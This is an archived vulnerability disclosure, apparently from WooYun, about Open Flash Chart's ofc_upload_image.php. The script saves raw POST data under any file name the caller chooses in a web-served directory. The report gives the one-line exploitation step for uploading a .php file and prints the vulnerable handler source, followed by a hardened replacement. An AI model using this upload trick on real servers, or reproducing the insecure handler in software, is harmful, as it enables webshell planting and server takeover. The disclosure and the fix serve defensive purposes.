WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
2013-02-20: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2013-02-20: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
Vulnerable file saves POSTed data to a file with an arbitrary extension
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php
Exploitation: request /chart/php-ofc-library/ofc_upload_image.php?name=hfy.php (hfy.php is the file name), POST arbitrary data, and it is saved at http://localhost/chart/tmp-upload-images/hfy.php
The vulnerable file is present in the latest version of wss, even in the paid edition, including the demo deployed in the Sina app store.
<?php
//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//
/*
print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );
print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
*/

// default path for the image to be stored //
$default_path = '../tmp-upload-images/';
if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();

//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';
if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}
?>
This vulnerable file is a disaster. To fix it, add authentication and extension validation, among other checks; sort it out yourselves.
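A hardened replacement for the handler along the lines the report suggests (authentication, extension validation), added here as an example and not code from Open Flash Chart or the report; it assumes an is_logged_in() session helper, the GD extension for image decoding, and a storage directory outside the web root.

```php
<?php
// Hardened ofc_upload_image.php (added example, not the project's code).
// Assumptions: an is_logged_in() helper exists, GD is installed, and
// /var/lib/ofc-uploads is a directory the web server does not serve.

// 1. Require an authenticated session before touching the filesystem.
if (!function_exists('is_logged_in') || !is_logged_in()) {
    http_response_code(403);
    exit('forbidden');
}

// 2. Validate the client-supplied name strictly: basename() alone stops
//    path traversal but still accepts "x.php". Only allow <token>.png.
$name = isset($_GET['name']) ? (string) $_GET['name'] : '';
if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.png$/', $name)) {
    http_response_code(400);
    exit('invalid name');
}

// 3. Read the raw body ($HTTP_RAW_POST_DATA no longer exists in PHP 7+)
//    and cap its size by reading one byte past the limit.
$limit = 5 * 1024 * 1024;
$raw = file_get_contents('php://input', false, null, 0, $limit + 1);
if ($raw === false || strlen($raw) === 0 || strlen($raw) > $limit) {
    http_response_code(413);
    exit('bad size');
}

// 4. Check that the payload really is a PNG: magic bytes plus a successful
//    decode, so a script renamed to .png is rejected.
if (substr($raw, 0, 8) !== "\x89PNG\r\n\x1a\n" || @imagecreatefromstring($raw) === false) {
    http_response_code(415);
    exit('not a png');
}

// 5. Store under a server-chosen name, outside the web root, non-executable.
$dir = '/var/lib/ofc-uploads';   // assumed path, not served by the web server
if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
    http_response_code(500);
    exit('storage unavailable');
}
$dest = $dir . '/' . bin2hex(random_bytes(16)) . '.png';
if (file_put_contents($dest, $raw, LOCK_EX) === false) {
    http_response_code(500);
    exit('write failed');
}
chmod($dest, 0640);
echo 'Saved ' . basename($dest);
```

The client-supplied name is only validated, never used for the stored path, so even a permissive web-server configuration for the upload directory cannot be turned into code execution.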
Unable to reach the vendor, or the vendor actively refused to respond.